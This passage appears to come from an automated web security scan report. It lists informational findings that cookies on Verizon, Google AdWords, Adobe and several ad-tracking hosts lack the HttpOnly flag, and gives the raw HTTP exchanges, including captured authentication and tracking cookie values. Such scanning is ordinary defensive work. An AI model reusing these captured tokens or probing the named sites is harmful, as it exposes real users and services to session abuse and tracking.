Date: Mon, 05 Sep 2011 22:37:54 GMT
Connection: close
Set-Cookie: GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; expires=Sun, 04-Dec-2011 23:37:54 GMT; path=/
Set-Cookie: HBXInitialVisit=Y; domain=.verizon.com; path=/

   
<div class="marquee_selector_bubble sprite sprite_marquee_bubble"></div>
                        <table class="marquee_selectors"><tr><td>
                       
                        <UL><LI><A class="marquee_selector
...[SNIP]...

10.11. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/409.178.tk.88x31/0.10282370378263295

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/409.178.tk.88x31/0.10282370378263295

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/409.178.tk.88x31/0.10282370378263295 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Sep 2011 22:43:03 GMT
Content-Type: image/gif
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=40:409:178:0:0:50961:1315262572:B2; expires=Thu, 06-Oct-2011 22:42:52 GMT; path=/
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sat, 26 Jul 1997 05:00:00 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 42

GIF89a.............!.......,...........L.;

10.12. http://ad.yieldmanager.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1195985&id=1195982&id=103815&t=2 HTTP/1.1
Host: ad.yieldmanager.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234568496.html
Cookie: bh="b!!!#o!!!?H!!!!$=1j[w!!*l]!!!!#=.lv=!!+^.!!!!#=3Elr!!-?2!!!!-=38n'!!-C,!!!!#=3BC@!!-O3!!!!*=38n'!!.uv!!!!#=3Elr!!/pp!!!!#=3Elr!!1SP!!!!#=38n,!!3O?!!!!#=3BC@!!UHs!!!!#=0>(p!!X41!!!!#=0>(p!!Zwa!!!!-=38n'!!g]C!!!!#=3Elr!!itb!!!!'=3]pn!!nAq!!!!#=3Elr!!pf4!!!!#=3BC@!!tP)!!!!#=3]pn!!tV-!!!!#=3]pn!!v'l!!!!#=3Elr!!vRm!!!!#=3]pn!!vRq!!!!%=3]pn!!vRr!!!!%=3]pn!!vRv!!!!#=3]pn!!vRw!!!!'=3]pn!!vRx!!!!%=3]pn!!vRy!!!!%=3]pn!!va'!!!!#=3Elr!!y!r!!!!#=3]pn!!y!v!!!!#=3]pn!#!,g!!!!'=3]pn!#!y?!!!!#=.lv=!#%v(!!!!#=2w#K!#.dO!!!!$=2Z2#!#.g1!!!!#=.e%I!#.mL!!!!$=0bvK!#/t]!!!!$=09of!#0Kr!!!!$=3M3E!#0L2!!!!%=1Cp-!#0fU!!!!$=3]pn!#0fW!!!!$=3]pn!#2A_!!!!#=3]pn!#2Ad!!!!#=3]pn!#2Gj!!!!#=3BC@!#2Oe!!!!#=1j[w!#2Of!!!!#=1j[w!#2XY!!!!#=3]pn!#44f!!!!%=3]pn!#44h!!!!%=3]pn!#5nZ!!!!#=3]pn!#7(x!!!!'=38n'!#7)a!!!!%=38n'!#?dj!!!!#=/(P2!#?dk!!!!#=/(P2!#C,X!!!!#=3Elr!#M7R!!!!#=09!!!#M7S!!!!#=1>Dd!#MTC!!!!%=3]pn!#MTH!!!!%=3]pn!#MTI!!!!%=3]pn!#MTJ!!!!%=3]pn!#N[7!!!!#=2w#K!#N[8!!!!#=09!!!#Ps:!!!!#=2[IV!#Q*T!!!!$=2Z2#!#Q,i!!!!#=2Z2#!#ROs!!!!#=3Elr!#SCj!!!!$=2Z2#!#SCk!!!!$=2Z2#!#Sw^!!!!#=/(P2!#TnE!!!!#=3]pn!#U5q!!!!#=09!!!#UDP!!!!%=3]pn!#YCf!!!!#=2w#K!#Ym:!!!!#=1,!r!#Ym>!!!!#=1,!r!#Z8E!!!!*=38n'!#Zgs!!!!%=38n'!#ZhT!!!!'=38n'!#[R[!!!!%=3]pn!#aG>!!!!$=2Z2#!#aP0!!!!'=/<(G!#bGa!!!!#=09!!!#bGi!!!!#=09!!!#bw^!!!!*=38n'!#dCX!!!!%=3Stu!#fBj!!!!*=38n'!#fBk!!!!*=38n'!#fBm!!!!*=38n'!#fBn!!!!*=38n'!#fG+!!!!%=38n'!#fvy!!!!(=3H<?!#g<y!!!!%=38n'!#nb^!!!!#=3M3D!#t>.!!!!#=1,!r!#tLr!!!!#=1+1N!#tM)!!!!#=3]pn!#tn2!!!!%=3]pn!#trp!!!!-=38n'!#ust!!!!$=2Z2#!#usu!!!!$=2Z2#!#uw*!!!!%=3]pn!#v,W!!!!#=09!!!#v,Y!!!!#=1>Dd!#v-$!!!!#=09!!!#wW9!!!!$=2Z2#!#x?H!!!!-=38n'!#xUN!!!!%=3]pn!#yM#!!!!$=2Z2#!$#4B!!!!$=38n'!$#9a!!!!#=1D5B!$#?.!!!!$=3H<B!$#R7!!!!#=3]pn!$#WA!!!!$=2Z2#!$$F#!!!!#=/bCH!$%'+!!!!$=/>v>!$%,!!!!!$=2Z2#!$%SB!!!!$=2Z2#!$'/Y!!!!#=09!!!$(!(!!!!-=38n'!$(!P!!!!*=38n'!$(Gt!!!!#=3]pn!$)gA!!!!#=09!!!$*a0!!!!$=2Z2#!$+M>!!!!#=3M3D!$,0h!!!!$=2Z2#!$,5d!!!!#=3Elr!$,jw!!!!#=2w#K!$-%:!!!!$=38n'!$-(b!!!!#=3]pn!$0Ge!!!!$=3M3H!$0VL!!!!%=38n'!$
0VM!!!!%=38n'!$1]+!!!!+=38n'!$1g/!!!!%=1D5F!$2j$!!!!$=2Z2#!$3IO!!!!*=38n'!$3y-!!!!(=2w%w!$4ou!!!!$=2Z2#!$5)A!!!!#=09!!!$5Rt!!!!#=1>Dd!$5Ru!!!!#=2w#K!$8+W!!!!%=38n'!$8>S!!!!'=3H<B!$8Js!!!!#=/(P2!$8Ju!!!!#=/(P2!$:3.!!!!#=2w#K!$<DI!!!!*=38n'!$=Gi!!!!#=0_Lo!$=X=!!!!#=3H<6!$=p7!!!!#=2Z2#!$=p8!!!!#=2Z2#!$=s9!!!!#=3+WO!$>#M!!!!#=2Z2#!$>#N!!!!#=2Z2#!$>_#!!!!#=2Z2#!$?=*!!!!#=3Elr!$?i5!!!!#=3BC@!$?tC!!!!#=38n'"; ih="b!!!!)!->h]!!!!$=3]pm!.`.U!!!!#=3H<:!0eUs!!!!#=1F/L!34fN!!!!#=/b4V!34fX!!!!#=/b4X!3DVF!!!!#=1F/N"; BX=8d7n6ot73ufk2&b=4&s=8m&t=219; pv1="b!!!!#!$'!L!$5*F!$kY3!3DVF!%JP7!!!!$!?5%!'2po7!?Q8(!'RQt~~~~~~~=1F/N=3CT*!!!(["; uid=uid=1071eb2c-d4cd-11e0-892f-78e7d1f5079e&_hmacv=1&_salt=321185080&_keyid=k1&_hmac=d75501ec81bb906d515b301e794922b4d10045fa; vuday1=FOL4uN:@*g1:+3O

Response

HTTP/1.1 302 Found
Date: Mon, 05 Sep 2011 22:14:38 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!#r!!!?H!!!!$=1j[w!!*l]!!!!#=.lv=!!+^.!!!!#=3Elr!!-?2!!!!-=38n'!!-C,!!!!#=3BC@!!-O3!!!!*=38n'!!.uv!!!!#=3Elr!!/pp!!!!#=3Elr!!1CB!!!!$=3_$E!!1SP!!!!#=38n,!!3O?!!!!#=3BC@!!UHs!!!!#=0>(p!!X41!!!!#=0>(p!!Zwa!!!!-=38n'!!g]C!!!!#=3Elr!!itb!!!!'=3]pn!!nAq!!!!#=3Elr!!pf4!!!!#=3BC@!!tP)!!!!#=3]pn!!tV-!!!!#=3]pn!!v'l!!!!#=3Elr!!vRm!!!!#=3]pn!!vRq!!!!%=3]pn!!vRr!!!!%=3]pn!!vRv!!!!#=3]pn!!vRw!!!!'=3]pn!!vRx!!!!%=3]pn!!vRy!!!!%=3]pn!!va'!!!!#=3Elr!!y!r!!!!#=3]pn!!y!v!!!!#=3]pn!#!,g!!!!'=3]pn!#!y?!!!!#=.lv=!#%v(!!!!#=2w#K!#.dO!!!!$=2Z2#!#.g1!!!!#=.e%I!#.mL!!!!$=0bvK!#/t]!!!!$=09of!#0Kr!!!!$=3M3E!#0L2!!!!%=1Cp-!#0fU!!!!$=3]pn!#0fW!!!!$=3]pn!#2A_!!!!#=3]pn!#2Ad!!!!#=3]pn!#2Gj!!!!#=3BC@!#2Oe!!!!#=1j[w!#2Of!!!!#=1j[w!#2XY!!!!#=3]pn!#44f!!!!%=3]pn!#44h!!!!%=3]pn!#5nZ!!!!#=3]pn!#7(x!!!!'=38n'!#7)a!!!!%=38n'!#?dj!!!!#=/(P2!#?dk!!!!#=/(P2!#C,X!!!!#=3Elr!#M7R!!!!#=09!!!#M7S!!!!#=1>Dd!#MTC!!!!%=3]pn!#MTH!!!!%=3]pn!#MTI!!!!%=3]pn!#MTJ!!!!%=3]pn!#N[7!!!!#=2w#K!#N[8!!!!#=09!!!#Ps:!!!!#=2[IV!#Q*T!!!!$=2Z2#!#Q,i!!!!#=2Z2#!#ROs!!!!#=3Elr!#SCj!!!!$=2Z2#!#SCk!!!!$=2Z2#!#Sw^!!!!#=/(P2!#TnE!!!!#=3]pn!#U5q!!!!#=09!!!#UDP!!!!%=3]pn!#YCf!!!!#=2w#K!#Ym:!!!!#=1,!r!#Ym>!!!!#=1,!r!#Z8E!!!!*=38n'!#Zgs!!!!%=38n'!#ZhT!!!!'=38n'!#[R[!!!!%=3]pn!#aG>!!!!$=2Z2#!#aP0!!!!'=/<(G!#bGa!!!!#=09!!!#bGi!!!!#=09!!!#bw^!!!!*=38n'!#dCX!!!!%=3Stu!#fBj!!!!*=38n'!#fBk!!!!*=38n'!#fBm!!!!*=38n'!#fBn!!!!*=38n'!#fG+!!!!%=38n'!#fvy!!!!(=3H<?!#g<y!!!!%=38n'!#nb^!!!!#=3M3D!#t>.!!!!#=1,!r!#tLr!!!!#=1+1N!#tM)!!!!#=3]pn!#tn2!!!!%=3]pn!#trp!!!!-=38n'!#uQD!!!!$=3_$E!#uQG!!!!$=3_$E!#ust!!!!$=2Z2#!#usu!!!!$=2Z2#!#uw*!!!!%=3]pn!#v,W!!!!#=09!!!#v,Y!!!!#=1>Dd!#v-$!!!!#=09!!!#wW9!!!!$=2Z2#!#x?H!!!!-=38n'!#xUN!!!!%=3]pn!#yM#!!!!$=2Z2#!$#4B!!!!$=38n'!$#9a!!!!#=1D5B!$#?.!!!!$=3H<B!$#R7!!!!#=3]pn!$#WA!!!!$=2Z2#!$$F#!!!!#=/bCH!$%'+!!!!$=/>v>!$%,!!!!!$=2Z2#!$%SB!!!!$=2Z2#!$'/Y!!!!#=09!!!$(!(!!!!-=38n'!$(!P!!!!*=38n'!$(Gt!!!!#=3]pn!$)gA!!!!#=09!!!$*a0!!!!$=2Z2#!$+M>!!!!#=3M3D!$,0h!!!!$=2Z2#!$,5d!!!!#=3Elr!$,jw!!!!#=2w#K!$-%:!!!!$=38
n'!$-(b!!!!#=3]pn!$0Ge!!!!$=3M3H!$0VL!!!!%=38n'!$0VM!!!!%=38n'!$1]+!!!!+=38n'!$1g/!!!!%=1D5F!$2j$!!!!$=2Z2#!$3IO!!!!*=38n'!$3y-!!!!(=2w%w!$4ou!!!!$=2Z2#!$5)A!!!!#=09!!!$5Rt!!!!#=1>Dd!$5Ru!!!!#=2w#K!$8+W!!!!%=38n'!$8>S!!!!'=3H<B!$8Js!!!!#=/(P2!$8Ju!!!!#=/(P2!$:3.!!!!#=2w#K!$<DI!!!!*=38n'!$=Gi!!!!#=0_Lo!$=X=!!!!#=3H<6!$=p7!!!!#=2Z2#!$=p8!!!!#=2Z2#!$=s9!!!!#=3+WO!$>#M!!!!#=2Z2#!$>#N!!!!#=2Z2#!$>_#!!!!#=2Z2#!$?=*!!!!#=3Elr!$?i5!!!!#=3BC@!$?tC!!!!#=38n'"; path=/; expires=Wed, 04-Sep-2013 22:14:38 GMT
Set-Cookie: BX=8d7n6ot73ufk2&b=4&s=8m&t=219; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Location: http://www.googleadservices.com/pagead/conversion/1032222048/?label=ERk9CKz3kgIQ4OqZ7AM&amp;guid=ON&amp;script=0
Cache-Control: no-store
Last-Modified: Mon, 05 Sep 2011 22:14:38 GMT
Pragma: no-cache
Content-Length: 0
Age: 0
Proxy-Connection: close


10.13. https://adwords.google.com/um/StartNewLogin

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /um/StartNewLogin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /um/StartNewLogin HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: SAG=EXPIRED;Path=/;Expires=Mon, 01-Jan-1990 00:00:00 GMT
Location: https://www.google.com/accounts/ServiceLogin?service=adwords&hl=en&ltmpl=adwords&passive=true&ifr=false&alwf=true&continue=https://adwords.google.com/um/gaiaauth?apt%3DNone
X-Invoke-Duration: 10
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 22:34:40 GMT
Expires: Mon, 05 Sep 2011 22:34:40 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/accounts/ServiceLogin?s
...[SNIP]...

10.14. http://ak1.abmr.net/is/cache.vzw.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/cache.vzw.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/cache.vzw.com?U=/globalnav/images/nav_bg_sprite.gif&V=3-7Tbed2GP0dnaoMNvnZ2eUgT58fMyPV8GBkYhYuHX82w1oxl053n8pXaDv2S97yea&I=4979291004F3928&D=verizonwireless.com&01AD=1& HTTP/1.1
Host: ak1.abmr.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/globalnav/css/globalnav-js.css?v=11-09
Cookie: 01AI=2-2-30E5D302E7B5AE52FB3FA64F3B114F4C89F6DA2CC7589E047F8A003B02A10801-7B9575B90C2ADB1B3A50CB744273B84103B43421BA655F664BF6383B75DF7234

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://cache.vzw.com/globalnav/images/nav_bg_sprite.gif?01AD=3lAIkR3iXBmXCwxuTNimn97d865hqXBlE_6DPM4OMu5fBEs-eIi6L_A&01RI=4979291004F3928&01NA=
Expires: Mon, 05 Sep 2011 22:14:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:14:34 GMT
Connection: close
Set-Cookie: 01AI=2-2-EE1D8367D5AACB1E26AA8F0FBEBD6C10ADDCD00A522E6E0942A5B70F0B0B5323-6CB0DFCE7722E5BC43790569F97DA7EA856B7EEF1C2FB591154B5DCDB8F73D15; expires=Tue, 04-Sep-2012 22:14:34 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


10.15. http://ak1.abmr.net/is/www22.verizon.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/www22.verizon.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/www22.verizon.com?U=/Content/VerizonGlobalHome/images/i/welcome_txt.png&V=3-PtxfAmkJoPkxd63gt9J5IQ3XKbrkCHZUrNo4pIqf4ae5qOX%2fkQyvyg%3d%3d&I=9F535B8C084D6DA&D=verizon.com&01AD=1& HTTP/1.1
Host: ak1.abmr.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/content/verizonglobalhome/ghp_landing.aspx
Cookie: 01AI=2-2-EC6E087E957D4D0A3545934FCB8D3C1B99B64863FCC14D306462E239165F9D1C-F808D72C3FE97181A94A7D7B4DA80EAA60A72A016141237C41FA5C587FB50FD6

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www22.verizon.com/Content/VerizonGlobalHome/images/i/welcome_txt.png?01AD=3JqCYcsE1rlAhTfmCIUyRZ-iggeiohK6a-FKkJ_aMvvIaMkdz3Ks80g&01RI=9F535B8C084D6DA&01NA=
Expires: Mon, 05 Sep 2011 22:13:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:13:38 GMT
Connection: close
Set-Cookie: 01AI=2-2-30E5D302E7B5AE52FB3FA64F3B114F4C89F6DA2CC7589E047F8A003B02A10801-7B9575B90C2ADB1B3A50CB744273B84103B43421BA655F664BF6383B75DF7234; expires=Tue, 04-Sep-2012 22:13:38 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


10.16. https://auth.verizon.com/amserver/UI/Login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://auth.verizon.com
Path:   /amserver/UI/Login

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /amserver/UI/Login HTTP/1.1
Host: auth.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:34:40 GMT
Content-length: 0
Content-type: text/html
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CUR ADM TAI PSD IVAi IVDi OTPi OTRi STP PHY ONL UNI "
Cache-control: private
Pragma: no-cache
Connection: close
X-dsameversion: 7 2005Q4 patch5 (Tue Feb 27 17:18:03 2007) SunOS
Am_client_type: genericHTML
Location: https://www22.verizon.com/myverizon/?session=n&goto=null
Set-cookie: AMAuthCookie=AQIC5wM2LY4SfczpWev%2Bj7wJV5p6Vi3At4%2BjPQ6Fv%2By5Kkk%3D%40AAJTSQACNjkAAlMxAAIwNg%3D%3D%23;Domain=.verizon.com;Path=/
Set-cookie: amlbcookie=06;Domain=.verizon.com;Path=/
Set-cookie: AMAuthCookie=LOGOUT;Domain=.verizon.com;Expires=Thu, 01-Jan-1970 00:00:10 GMT;Path=/


10.17. https://auth.verizon.net/amserver/UI/Login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://auth.verizon.net
Path:   /amserver/UI/Login

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /amserver/UI/Login HTTP/1.1
Host: auth.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:34:40 GMT
Content-length: 0
Content-type: text/html
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-control: private
Pragma: no-cache
Connection: close
X-dsameversion: 7 2005Q4 patch 120954-05
Am_client_type: genericHTML
Location: https://www.verizon.net/ssowebapp/VOLPortalLoginnull
Set-cookie: AMAuthCookie=AQIC5wM2LY4SfczLMfAqxGV1489wz3vJJDjxw2SWemh5VQo%3D%40AAJTSQACMzAAAlMxAAIwNA%3D%3D%23;Domain=.verizon.net;Path=/
Set-cookie: amlbcookie=04;Domain=.verizon.net;Path=/
Set-cookie: AMAuthCookie=LOGOUT;Domain=.verizon.net;Expires=Thu, 01-Jan-1970 00:00:10 GMT;Path=/


10.18. http://cache.vzw.com/globalnav/images/nav_bg_sprite.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cache.vzw.com
Path:   /globalnav/images/nav_bg_sprite.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /globalnav/images/nav_bg_sprite.gif?01AD=3Xxb5cGQpT1L4o_oOLroIebqfANPB4UFu_z48jlyljwyA3Qbv3rwiCA&01RI=4979291004F3928&01NA= HTTP/1.1
Host: cache.vzw.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/globalnav/css/globalnav-js.css?v=11-09
Cookie: V1Z2=CT-1

Response

HTTP/1.1 200 OK
Server: None
Content-Type: image/gif
Last-Modified: Tue, 12 Jul 2011 03:47:11 GMT
Content-Length: 1017
ETag: "3f9-4e1bc3bf"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:14:35 GMT
Connection: close
Set-Cookie: V1Z2=3Xxb5cGQpT1L4o_oOLroIebqfANPB4UFu_z48jlyljwyA3Qbv3rwiCA; expires=Mon, 03-Oct-2011 22:14:35 GMT; path=/; domain=.vzw.com
P3P: CP="NON DSP ADM DEV PSD OUR IND STP PHY PRE NAV UNI"

GIF89a.....^...............................k............................................................................................m........t................................p..v........z........r
...[SNIP]...

10.19. http://community.adobe.com/help/about.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.adobe.com
Path:   /help/about.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help/about.html HTTP/1.1
Host: community.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:34:46 GMT
Set-Cookie: ach-locale=en_US; Domain=adobe.com; Expires=Wed, 05-Oct-2011 22:34:46 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 24306


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>

...[SNIP]...

10.20. http://content.atomz.com/pb00002f7b/publish/includes/css/marquee.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.atomz.com
Path:   /pb00002f7b/publish/includes/css/marquee.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pb00002f7b/publish/includes/css/marquee.css HTTP/1.1
Host: content.atomz.com
Proxy-Connection: keep-alive
Referer: http://search.verizon.com/?tp=c&rv=b&q=xss%20sq
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lv=1314796046155; s_vnum=1317388046156%26vn%3D1

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:17:13 GMT
Server: Atomz/1.0
Set-Cookie: v1stsp=A835F590A06A9B4F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.atomz.com
Last-Modified: Wed, 24 Oct 2007 13:31:58 GMT
ETag: "34c02f5-76-471f494e"
Accept-Ranges: bytes
Content-Length: 118
Content-Type: text/css
Via: 1.1 content.atomz.com:84
X-Cache: MISS from content.atomz.com

.blackberry {background:url(http://content.atomz.com/pb00002f7b/publish/i/lifestyle-image.jpg) no-repeat top right;}

10.21. http://d.agkn.com/pixel!t=932!

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.agkn.com
Path:   /pixel!t=932!

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel!t=932!?che=71441105&atr=124134 HTTP/1.1
Host: d.agkn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/4357?ret=html&r=77101&phint=hc3%3D%7C&phint=logInDisplay%3D1&phint=lpLanguage%3Denglish&phint=lpMarket%3Dgeneric&phint=Keywords%3DCell%20Phone%20Deals%2C%20Cell%20Phone%20Discounts%2C%20Online%20Specials%2C%20Packages&phint=bk_t%3DCell%20Phone%20Savings%20%26%20Discounts%20-%20Verizon%20Wireless&phint=bk_k%3DCell%20Phone%20Deals%2C%20Cell%20Phone%20Discounts%2C%20Online%20Specials%2C%20Packages&phint=bk_pr%3Dhttp%3A%2F%2Fwww.verizonwireless.com%2Fb2c%2Findex.html
Cookie: uuid=790101267012119588; u=6|0BEgV0fs5AAAgAAYBACQBAtGcggUAuwEAggCcAQCCAJ0BAIIAngEAggDOAQCCAgDPfQBtAAIf7ON3HooAAAAAAmz0YAAAAAAOcraKAdsBAAOtugICUH0B5QAAAAAD7CrBAAAAAAKWW1AAAAAADny33QFrAAA%3D

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=790101267012119588; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sat, 03-Sep-2016 22:15:21 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEgV%2BAZ5AAAwAAgBACcBBVirAAUAuwEAnwDOAQCfAJwBAJ8AnQEAnwCeAQCfAQJQfQHlAAAAAAPsKsEAAAAAApZbUAAAAAAOfLfdAWsAHQ%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Wed, 04-Sep-2013 22:15:21 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"43-1313398290000"
Last-Modified: Mon, 15 Aug 2011 08:51:30 GMT
Content-Type: image/gif
Content-Language: en-US
